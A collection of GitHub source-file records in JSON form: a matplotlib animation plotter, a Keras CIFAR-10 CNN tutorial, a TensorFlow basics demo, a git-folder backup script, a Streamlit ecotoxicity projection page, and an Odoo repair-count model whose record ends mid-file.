+{"seq_id":"16765341612","text":"\"\"\"Offer a field plotter.\"\"\"\nimport copy\nimport warnings\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Union\n\nimport numpy as np\nimport numpy.typing as npt\nfrom matplotlib import colors\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.axes import Axes\nfrom matplotlib.colorbar import Colorbar\nfrom matplotlib.figure import Figure, SubFigure\nfrom matplotlib.image import AxesImage\nfrom matplotlib.lines import Line2D\nfrom matplotlib.text import Text\n\nfrom nested_grid_plotter.base_plotter import NestedGridPlotter\nfrom nested_grid_plotter.imshow import (\n _apply_default_colorbar_kwargs,\n _apply_default_imshow_kwargs,\n _check_axes_and_data_consistency,\n _scale_cbar,\n)\n\n# pylint: disable=C0103 # does not confrom to snake case naming style\n# pylint: disable=R0913 # too many arguments\n# pylint: disable=R0914 # too many local variables\n\n# Define some types for numpy\nNDArrayFloat = npt.NDArray[np.float64]\nNDArrayInt = npt.NDArray[np.int64]\n\n\ndef _get_nb_frames(nb_frames: Optional[int], nb_steps: int) -> int:\n \"\"\"\n Get the correct number of frames.\n\n Parameters\n ----------\n nb_frames : Optional[int]\n Number of frames to plot. If None, then the number of steps is used.\n nb_steps : int\n Number of steps (data arrays available for plot).\n\n Returns\n -------\n int\n The correct number of frames.\n\n Raises\n ------\n warnings.warn\n If the nb_frames required exceeds the number of steps.\n \"\"\"\n if nb_frames is None:\n return nb_steps\n if nb_frames > nb_steps:\n warnings.warn(\n UserWarning(\n f\"The nb_frames ({nb_frames}) required exceeds the number of steps\"\n f\" available (last dimension of arrays = {nb_steps})!\"\n \" Some images will be repeated.\"\n )\n )\n return nb_frames\n\n\nclass AnimatedPlotter(NestedGridPlotter):\n \"\"\"Nestedgrid plotter with embedded animation support.\"\"\"\n\n _animation: Optional[FuncAnimation]\n\n def __init__(\n self,\n fig_params: Optional[Dict[str, Any]] = None,\n subfigs_params: Optional[Dict[str, Any]] = None,\n subplots_mosaic_params: Optional[Dict[str, Any]] = None,\n ) -> None:\n \"\"\"\n Initiate the instance.\n\n Parameters\n ----------\n fig_params : Optional[Dict[str, Any]], optional\n See :class:`NestedGridPlotter` for other possible arguments.\n The default is None.\n subfigs_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. The default is None.\n subplots_mosaic_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n None\n \"\"\"\n _fig_params = dict(constrained_layout=True)\n if fig_params is not None:\n _fig_params.update(fig_params)\n\n super().__init__(_fig_params, subfigs_params, subplots_mosaic_params)\n # self.fig.patch.set_facecolor(\"w\")\n self.init_animations_list: List[Callable] = []\n self.animations_list: List[Callable] = []\n self.animation = None\n\n @property\n def animation(self) -> FuncAnimation:\n \"\"\"Get the animation or raise an attribute error if not defined.\"\"\"\n if self._animation is None:\n raise AttributeError(\"No animation as been defined !\")\n return self._animation\n\n @animation.setter\n def animation(self, animation: Optional[FuncAnimation]) -> None:\n self._animation = animation\n\n def _init_animate(self) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n return [f for f_list in self.init_animations_list for f in f_list()]\n\n def _animate(self, i) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Update the data of the plot.\"\"\"\n return [f for f_list in self.animations_list for f in f_list(i)]\n\n def animate(self, nb_frames: int, blit: bool = True) -> FuncAnimation:\n \"\"\"\n Animate the plot.\n\n Parameters\n ----------\n nb_frames : int\n The number of frames to consider for the animation.\n blit: bool, optional\n Whether blitting is used to optimize drawing. Note: when using blitting,\n any animated artists will be drawn according to their zorder; however,\n they will be drawn on top of any previous artists, regardless of their\n zorder. The default is True.\n\n Returns\n -------\n animation.FuncAnimation\n The animation.\n\n \"\"\"\n # plt.close(self.fig)\n self.animation = FuncAnimation(\n self.fig,\n self._animate,\n init_func=self._init_animate,\n frames=range(nb_frames),\n interval=1,\n blit=blit,\n repeat=False,\n )\n return self.animation\n\n def plot_animated_text(\n self, ax: Axes, x: float, y: float, s: Sequence[str], **kwargs: Any\n ) -> None:\n \"\"\"\n Add a text animation to the given axis.\n\n Parameters\n ----------\n ax : Axes\n Axis to which add the text.\n x : float\n x position of the text.\n y : float\n y position of the text.\n s : Sequence[str]\n Sequence of text value to display.\n **kwargs : Dict[str, Any]\n Optional arguments for the class:`Text`.\n\n Returns\n -------\n None\n\n \"\"\"\n txt: Text = ax.text(x, y, s[0], **kwargs)\n\n def _animate(frame: int) -> List[Text]:\n \"\"\"Update the text value.\"\"\"\n txt.set_text(s[frame])\n return [\n txt,\n ]\n\n # self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_plot(\n self,\n ax_name: str,\n data: Dict[str, Dict[str, Any]],\n nb_frames: Optional[int] = None,\n title: Optional[str] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n ) -> None:\n \"\"\"\n Plot a 1D animated curves.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_name : str\n Name of the axis on which to plot the animation.\n data : Dict[str, Dict[str, Any]]]\n Data to be plotted.\n nb_frames: int\n Number of frames to use in the animation. If None, the second dimension of\n the provided data arrays is used.\n title : Optional[str], optional\n Title to give to the plot. The default is None.\n xlabel : Optional[str], optional\n Label for the xaxis. The default is None.\n ylabel : Optional[str], optional\n Label for the yaxis. The default is None.\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n ax: Axes = self.ax_dict[ax_name]\n\n # store all data in a list\n x_list: List[NDArrayFloat] = []\n y_list: List[NDArrayFloat] = []\n # The results are stored in plot_dict and allow updating the values.\n plot_dict = {}\n\n for label, val in data.items():\n kwargs: Dict[str, Any] = val.get(\"kwargs\", {})\n x = val.get(\"x\", None)\n _val = val.get(\"y\")\n if _val is not None:\n y: NDArrayFloat = _val\n else:\n raise ValueError(\n f'Error with data arguments: for key \"{label}\" y must be given!'\n )\n\n # Generate a series to adjust the y axis bounds without setting\n # y_extend = np.nanmax(y_list) - np.nanmin(y_list)\n y_extend = np.linspace(np.nanmin(y), np.nanmax(y), y.shape[0])\n\n if x is not None:\n x_extend = np.linspace(np.nanmin(x), np.nanmax(x), x.shape[0])\n x_list.append(x.reshape(x.shape[0], -1)) # make sure that x is 2d\n else:\n x_extend = np.arange(y.shape[0])\n plot_dict[label] = ax.plot(x_extend, y_extend, label=label, **kwargs)[0]\n y_list.append(y)\n\n nb_steps: int = y_list[0].shape[1]\n\n # Number of x and y consistency\n if len(x_list) != 0 and (len(x_list) != len(y_list)):\n raise ValueError(\n \"When the x vector is provided, it must be for each y vector!\"\n )\n\n # Check that all arrays have the same number of frames\n if not all((y_list[0].shape[1] == y.shape[1] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same number of steps (last dimension)!\"\n )\n if len(x_list) > 1:\n if not all((x_list[0].shape[1] == x.shape[1] for x in x_list[1:])):\n raise ValueError(\n \"Not all given x arrays have the same number \"\n \"of steps (last dimension)!\"\n )\n\n # Check the dimensions\n if not all((y_list[0].shape[0] == y.shape[0] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same first dimension (n values)!\"\n )\n\n if title:\n ax.set_title(title, fontweight=\"bold\")\n if xlabel:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n def _init() -> List[Line2D]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label in data.keys():\n plot_dict[label].set_ydata(\n np.full(y_list[0][:, 0].size, fill_value=np.nan),\n )\n return list(plot_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[Line2D]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for index, label in enumerate(data.keys()):\n # update x\n if len(x_list) != 0:\n try:\n plot_dict[label].set_xdata(x_list[index][:, data_index])\n except IndexError:\n pass\n # update y\n plot_dict[label].set_ydata(\n y_list[index][:, data_index],\n )\n return list(plot_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_imshow(\n self,\n ax_names: Iterable[str],\n data: Dict[str, NDArrayFloat],\n fig: Optional[Union[Figure, SubFigure]] = None,\n nb_frames: Optional[int] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n imshow_kwargs: Optional[Dict[str, Any]] = None,\n cbar_kwargs: Optional[Dict[str, Any]] = None,\n is_symetric_cbar: bool = False,\n cbar_title: Optional[str] = None,\n ) -> Colorbar:\n \"\"\"\n Plot an animated 2D field with imshow.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_names : str\n List of axis names in which to plot the data. The order of axes must be\n the same as that of the data.\n data : Dict[str, Union[np.ndarray, Dict[str, Any]]]\n Data to be plotted.\n fig: Optional[Figure, SubFigure]\n Which figure to consider for the color bar. By default, use self.fig.\n nb_frames : Optional[int]\n Number of frame to use. By default, it is the number of provided steps,\n that is to say the last dimension of the arrays. If the number of frames\n exceeds the number of steps available, some steps will be repeated once\n or more and a warning is raised.\n xlabel : Optional[str], optional\n Label to apply to all xaxes. The default is None.\n ylabel : Optional[str], optional\n Label to apply to all yaxes. The default is None.\n imshow_kwargs: Optional[Dict[str, Any]] optional\n Optional arguments for `plt.imshow`. The default is None.\n\n Examples\n --------\n Examples can be given using either the ``Example`` or ``Examples``\n sections. Sections support any reStructuredText formatting, including\n literal blocks::\n\n $ python example_numpy.py\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n axes: list[Axes] = [self.ax_dict[ax_name] for ax_name in ax_names]\n # The number of ax_name and data provided should be the same:\n _check_axes_and_data_consistency(axes, data)\n\n # Add some default values for imshow and colorbar\n _imshow_kwargs: Dict[str, Any] = _apply_default_imshow_kwargs(imshow_kwargs)\n _cbar_kwargs: Dict[str, Any] = _apply_default_colorbar_kwargs(cbar_kwargs, axes)\n\n # store all data in a list\n data_list = []\n # The results are stored in plot_dict and allow updating the values.\n\n images_dict: Dict[str, AxesImage] = {}\n for j, (label, values) in enumerate(data.items()):\n ax = self.ax_dict[ax_names[j]]\n if not len(values.shape) == 3:\n raise ValueError(\n f'The given data for \"{label}\" has shape {values.shape} '\n \"whereas it should be three dimensional!\"\n )\n\n # Need to transpose because the dimensions (M, N) define the rows and\n # columns\n # Also, need to copy the _imshow_kwargs to avoid its update. Otherwise the\n # colorbar scaling does not work properly\n images_dict[label] = ax.imshow(\n values[:, :, 0].T, **copy.deepcopy(_imshow_kwargs)\n )\n data_list.append(values)\n\n ax.label_outer()\n ax.set_title(label, weight=\"bold\")\n if xlabel is not None:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel is not None:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n nb_steps: int = data_list[0].shape[2]\n\n # Check that all arrays have the same number of timesteps\n if not all((nb_steps == x.shape[2] for x in data_list[1:])):\n raise ValueError(\n \"Not all given arrays have the same number of steps (last dimension)!\"\n )\n\n # Colorbar scaling\n norm: Optional[colors.Normalize] = _imshow_kwargs.get(\"norm\")\n if norm is not None:\n vmin: Optional[float] = norm.vmin\n vmax: Optional[float] = norm.vmax\n if isinstance(norm, colors.LogNorm):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n False,\n is_log=True,\n vmin=vmin,\n vmax=vmax,\n )\n elif isinstance(_imshow_kwargs.get(\"norm\"), colors.Normalize):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n is_symetric_cbar,\n vmin=vmin,\n vmax=vmax,\n )\n\n if fig is None:\n _fig: Union[Figure, SubFigure] = self.fig\n else:\n _fig: Union[Figure, SubFigure] = fig\n\n # pylint: disable=C0123 # use isinstance instead\n cbar: Colorbar = _fig.colorbar(list(images_dict.values())[0], **_cbar_kwargs)\n if cbar_title is not None:\n cbar.ax.get_yaxis().labelpad = 20\n cbar.ax.set_ylabel(cbar_title, rotation=270)\n\n def _init() -> List[AxesImage]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label, values in data.items():\n images_dict[label].set_data(\n np.full(values[:, :, 0].T.shape, fill_value=np.nan),\n )\n return list(images_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[AxesImage]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for label in data.keys():\n images_dict[label].set_data(\n data[label][:, :, data_index].T,\n )\n return list(images_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n return cbar\n","repo_name":"antoinecollet5/nested_grid_plotter","sub_path":"nested_grid_plotter/animated_plotter.py","file_name":"animated_plotter.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37216384037","text":"import matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\n\n# The dataset contains 50,000 training images and 10,000 test images.\n# Loading the dataset:\nprint('CIFAR-10 Dataset!')\n(train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n# CIFAR-10 contains these classes:\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'lorry']\n\n# -----------------------------\n# This function will display the first 16 images of the dataset with their labels:\ndef visualize_data(train_X, train_Y, class_names):\n\n for i in range(16):\n # create subplot:\n plt.subplot(4, 4, i+1)\n plt.xticks([])\n plt.yticks([])\n # plot image with the class name on the x-axis:\n plt.imshow(train_X[i])\n plt.xlabel(class_names[train_Y[i].item()])\n\n # adjust the subplots and show the first 16 images:\n plt.subplots_adjust(left=0.125,\n bottom=0.1, \n right=0.9, \n top=0.9, \n wspace=0.2, \n hspace=0.35)\n plt.show()\n# -----------------------------\n\n# Displaying the first sixteen images within the dataset:\nvisualize_data(train_X, train_Y, class_names)\n\n# Printing information about the loaded dataset:\nprint(f'There are {train_X.shape[0]} images of size {train_X.shape[1:]} in the Training set of the CIFAR-10 Dataset.')\nprint(f'There are {test_X.shape[0]} images of size {test_X.shape[1:]} in the Test set of the CIFAR-10 Dataset.')\n\n\"\"\"Now that the dataset has been verified, we can begin preparing for the training process. First, let's import all that we need:\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow import keras\nimport tensorflow as tf\n\nprint('Keras version:', keras.__version__)\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\n\"\"\"We now define two functions that will load and process the data in preparation for training:\"\"\"\n\n# Function used to load the dataset:\ndef load_data():\n\n # Loading the built-in CIFAR-10 dataset from Keras:\n (train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n print('The dataset has been loaded:')\n print(f'Train: X={train_X.shape}, Y={train_Y.shape}')\n print(f'Test: X={test_X.shape}, Y={test_Y.shape}')\n\n # Converting the class labels to one hot vectors:\n train_Y = to_categorical(train_Y)\n test_Y = to_categorical(test_Y)\n\n return train_X, train_Y, test_X, test_Y\n \n# -----------------------------\n\n# Function used to prepare the data:\ndef pre_process_data(train_data, test_data):\n\n # Casting pixel values to floats:\n train_data = train_data.astype('float32')\n test_data = test_data.astype('float32')\n\n # normalising pixel values to range [0-1]\n train_data = train_data / 255.0\n test_data = test_data / 255.0\n\n print(f'Train data is in range {train_data.min()} to {train_data.max()}.')\n print(f'Test data is in range {test_data.min()} to {test_data.max()}.')\n\n return train_data, test_data\n\nprint('Done!')\n\n\"\"\"We will also define a function responsible for plotting the curves:\"\"\"\n\n# Function used to plot the curves for loss and accuracy:\ndef plot_curves(history):\n\n # Plotting the loss curve:\n plt.subplot(211)\n plt.title('Cross Entropy')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n # Plotting the training loss (blue):\n plt.plot(history.history['loss'], color='blue', label='train')\n # Plotting the test loss (red):\n plt.plot(history.history['val_loss'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n # Plotting the accuracy curve:\n plt.subplot(212)\n plt.title('Classification Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # Plotting the training accuracy (blue):\n plt.plot(history.history['accuracy'], color='blue', label='train')\n # Plotting the test accuracy (red):\n plt.plot(history.history['val_accuracy'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.subplots_adjust(top=3)\n plt.show()\n\nprint('Done!')\n\n\"\"\"Now we are ready to design our model architecture.\n\nThe architecture comprises **three CONV layers** with **RELU activation functions**, each followed by **Max Pooling** layers. At the end, there is a **fully-connected** classifier that will classify the input into one of 10 outputs, using **cross entropy** as the loss function:\n\"\"\"\n\n# This function defines our neural network:\ndef create_model():\n\n model = Sequential()\n\n # The first conv layer with 32 kernels of 3*3 receiving an input of 32*32*3:\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 64 kernels of 3*3:\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 128 kernels of 3*3:\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # The feature maps are flattened at this point to be passed into fully-connected layers:\n model.add(Flatten())\n\n # Fully-connected layers leading to 10 classes with a softmax activation function:\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(10, activation='softmax'))\n\n # The optimiser is stochastic gradient descent with a learning rate of f 0.001 and a momentum of 0.9:\n optim = SGD(lr=0.001, momentum=0.9)\n\n # The model optimises cross entropy as its loss function and will monitor classification accuracy:\n model.compile(optimizer=optim, loss='categorical_crossentropy', metrics=['accuracy'])\n\n # Printing model summary:\n print(model.summary())\n\n return model\n\nprint('Done!')\n\n\"\"\"Now that all preparations are made and the model has been designed, it is time to start training the model.\n\nFirst, let's load the dataset:\n\"\"\"\n\ntrainX, trainY, testX, testY = load_data()\n\n\"\"\"Now, we pre-process the images using the function we defined earlier:\"\"\"\n\ntrainX, testX = pre_process_data(trainX, testX)\n\n\"\"\"Let's create the model:\"\"\"\n\nmodel = create_model()\n\n\"\"\"The model can now be trained for 20 epochs with a batch size of 64:\"\"\"\n\nhistory = model.fit(trainX, trainY, epochs=20, batch_size=64, validation_data=(testX, testY))\nprint('Done!')\n\n\"\"\"After the training is complete, we can evaluate the model on the test set and obtain the final accuracy level:\"\"\"\n\n_, acc = model.evaluate(testX, testY, verbose=1)\nprint('Accuracy: %.3f' % (acc * 100.0))\n\n\"\"\"We can plot the loss and accuracy curves to better analyse the training process.\n\nThe **blue** curves indicate performance over the **training data** and the *red* curves represent model performance over the *test data*:\n\"\"\"\n\nplot_curves(history)","repo_name":"atapour/keras-dl-examples","sub_path":"simple-cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"22030091439","text":"from __future__ import print_function\nimport tensorflow as tf\nimport os\nimport numpy as np\n\n\ntf.flags.DEFINE_string(\n 'log_dir', os.path.dirname(os.path.abspath(__file__)) + '/logs',\n 'Directory where event logs are written to.')\n\nFLAGS = tf.flags.FLAGS\n\n\nif not os.path.isabs(os.path.expanduser(FLAGS.log_dir)):\n raise ValueError('You must assign absolute path for --log_dir')\n'''----------------------------------------------------------------------------------'''\n\n# tf.constant\n# 定义一些常量\na = tf.constant(5, name=\"a\")\nb = tf.constant(10, name=\"b\")\ntensor_a = 5*tf.ones([5, 5])\ntensor_b = 3*tf.ones([5, 5])\n\n# 一些基本的运算\nx = tf.add(a, b, name=\"add\")\ny = tf.div(a, b, name=\"divide\")\n\n'''----------------------------------------------------------------------------------'''\n\n# Run the session\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter(os.path.expanduser(FLAGS.log_dir), sess.graph)\n print(\"a =\", sess.run(a))\n print(\"b =\", sess.run(b))\n print(\"a + b =\", sess.run(x))\n print(\"a/b =\", sess.run(y))\n\n# Closing the writer.\nwriter.close()\nsess.close()\n\n","repo_name":"AtticusJohnson/TensorFlowLearning","sub_path":"PracticeCode/Tensorflow-Course/1-basic_math_operation.py","file_name":"1-basic_math_operation.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"69969433290","text":"import os\r\nimport time\r\nimport zipfile\r\n\r\nworkSpace = \"/Users/alphahinex/workspace\"\r\nbackupRoot = \"/Users/alphahinex/github/trunk/gitbackup/backup\"\r\nweek = time.strftime(\"%w\")\r\nbackupPath = os.path.join(backupRoot, week)\r\n\r\n# clean zip file which is a week ago\r\ndelCommand = \"rm -f \" + os.path.join(backupRoot,week + \".zip\")\r\nos.system(delCommand)\r\n\r\n# get all .git root path\r\nfirstLvs = os.listdir(workSpace)\r\nsrcDirs = []\r\nfor firstdir in firstLvs:\r\n if(os.path.isdir(os.path.join(workSpace,firstdir))):\r\n for secdir in os.listdir(os.path.join(workSpace,firstdir)):\r\n if(secdir.find('git')>0):\r\n if(os.path.isdir(os.path.join(workSpace,firstdir,secdir))):\r\n srcDirs.append(firstdir)\r\n\r\n# copy .git folder\r\nfor folder in srcDirs:\r\n copyCommand = \"mkdir -p \" + os.path.join(backupPath, folder) + \" && \"\r\n copyCommand += \"cp -R \" + os.path.join(workSpace,folder,\".git\") + \" \" + os.path.join(backupPath,folder,\".git\")\r\n os.system(copyCommand)\r\n\r\n# zip the backup folder\r\nfilelist = []\r\nfor root, dirs, files in os.walk(backupPath):\r\n for name in files:\r\n filelist.append(os.path.join(root,name))\r\n\r\nzf = zipfile.ZipFile(os.path.join(backupRoot,week+\".zip\"),\"w\",zipfile.zlib.DEFLATED)\r\nfor fileToZip in filelist:\r\n zf.write(fileToZip)\r\nzf.close()\r\n\r\n# clean temp folder\r\nrdCommand = \"rm -rf \" + backupPath\r\nos.system(rdCommand)","repo_name":"AlphaHinex/trunk","sub_path":"gitbackup/backupgit_unix_py2_v1.py","file_name":"backupgit_unix_py2_v1.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39262820460","text":"import streamlit as st\nimport io\nimport pandas as pd\nimport numpy as np\nfrom custom_download_button import download_button\nfrom inference_utils.plots_for_space import PlotPCA_CLSProjection, PlotUMAP_CLSProjection, PlotPaCMAP_CLSProjection\n\n\neffectordering = {\n 'EC50_algae': {'POP':'POP'},\n 'EC10_algae': {'POP':'POP'},\n 'EC50EC10_algae': {'POP':'POP'}, \n 'EC50_invertebrates': {'MOR':'MOR','ITX':'ITX'},\n 'EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50_fish': {'MOR':'MOR'},\n 'EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} ,\n 'EC50EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} \n }\n\nendpointordering = {\n 'EC50_algae': {'EC50':'EC50'},\n 'EC10_algae': {'EC10':'EC10'},\n 'EC50EC10_algae': {'EC50':'EC50', 'EC10': 'EC10'}, \n 'EC50_invertebrates': {'EC50':'EC50'},\n 'EC10_invertebrates': {'EC10':'EC10'},\n 'EC50EC10_invertebrates': {'EC50':'EC50', 'EC10': 'EC10'},\n 'EC50_fish': {'EC50':'EC50'},\n 'EC10_fish': {'EC10':'EC10'},\n 'EC50EC10_fish': {'EC50':'EC50', 'EC10': 'EC10'} \n }\n\ndef print_space_page():\n col1, col2 = st.columns((1,3))\n with col1:\n st.markdown('## Projection metrics')\n projection = st.selectbox('Projection method', ('PCA','UMAP'))\n species_group = {'fish': 'fish', 'aquatic invertebrates': 'invertebrates', 'algae': 'algae'}\n model_type = {'Combined model (best performance)': 'EC50EC10'}\n \n PREDICTION_SPECIES = species_group[st.radio(\"Select Species group\", tuple(species_group.keys()), on_change=None, help=\"Don't know which to use? \\n Check the `Species groups` section under `Documentation`\")]\n MODELTYPE = model_type[st.radio(\"Select Model type\", tuple(model_type), on_change=None, help=\"Don't know which to use?\\n Check the `Models` section under `Documentation`\")]\n endpoints = endpointordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n effects = effectordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n PREDICTION_ENDPOINT = endpoints[st.radio(\"Select Endpoint \",tuple(endpoints.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Endpoints` section under `Documentation`\")]\n PREDICTION_EFFECT = effects[st.radio(\"Select Effect \",tuple(effects.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Effects` section under `Documentation`\")]\n \n PREDICTION_EXTENDED_DATA = st.checkbox('show predictions outside training data')\n if projection == 'UMAP':\n MIN_DISTNACE = st.number_input('min distance')\n N_NEIGHBORS = st.number_input('n neighbors')\n\n run_prediction = st.button('Predict')\n \n with col2:\n if run_prediction:\n with st.spinner(text = 'Inference in Progress...'):\n if projection == 'PCA':\n fig = PlotPCA_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'UMAP':\n fig = PlotUMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None, n_neighbors=N_NEIGHBORS, min_dist=MIN_DISTNACE)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'PaCMAP':\n fig = PlotPaCMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n\n buffer = io.StringIO()\n fig.write_html(buffer, include_plotlyjs='cdn')\n html_bytes = buffer.getvalue().encode()\n\n download_button_str = download_button(html_bytes, 'interactive_CLS_projection.html', 'Lagging ➡ Download HTML', pickle_it=False)\n st.markdown(download_button_str, unsafe_allow_html=True)\n","repo_name":"StyrbjornKall/TRIDENT_application","sub_path":"space_page.py","file_name":"space_page.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7101812703","text":"from collections import defaultdict\n\nfrom odoo import _, fields, models\n\n\nclass ProductProduct(models.Model):\n _inherit = \"product.product\"\n\n repair_count = fields.Float(\n compute_sudo=True,\n compute=\"_compute_repair\",\n string=\"Repairs\",\n help=\"Number of Repair Orders where the product appears as a Part\",\n )\n in_repair_ids = fields.Many2many(\n comodel_name=\"repair.order\", compute=\"_compute_repair\", store=True\n )\n\n def _compute_repair(self):\n self.repair_count = 0\n product_rma_dict = defaultdict(list)\n [\n product_rma_dict[operation.product_id.id].append(operation.repair_id.id)\n for operation in self.env[\"repair.line\"].search(\n [\n (\"company_id\", \"in\", self.env.company.ids),\n (\"product_id\", \"in\", self.ids),\n ]\n )\n ]\n for product in self:\n if not product.id:\n product.repair_count = 0.0\n continue\n product.in_repair_ids = product_rma_dict.get(product.id, [])\n product.repair_count = len(\n product.in_repair_ids.filtered(\n lambda x: x.state not in (\"draft\", \"cancel\")\n )\n )\n\n def action_product_product_in_rma_list(self):\n domain = [\n (\"id\", \"in\", self.in_repair_ids.ids),\n ]\n context = {\n \"search_default_not_draft\": 1,\n }\n\n action = {\n \"name\": _(\"Repair Orders\"),\n \"type\": \"ir.actions.act_window\",\n \"res_model\": \"repair.order\",\n \"view_type\": \"list\",\n \"view_mode\": \"list,form\",\n \"domain\": domain,\n \"context\": context,\n }\n return 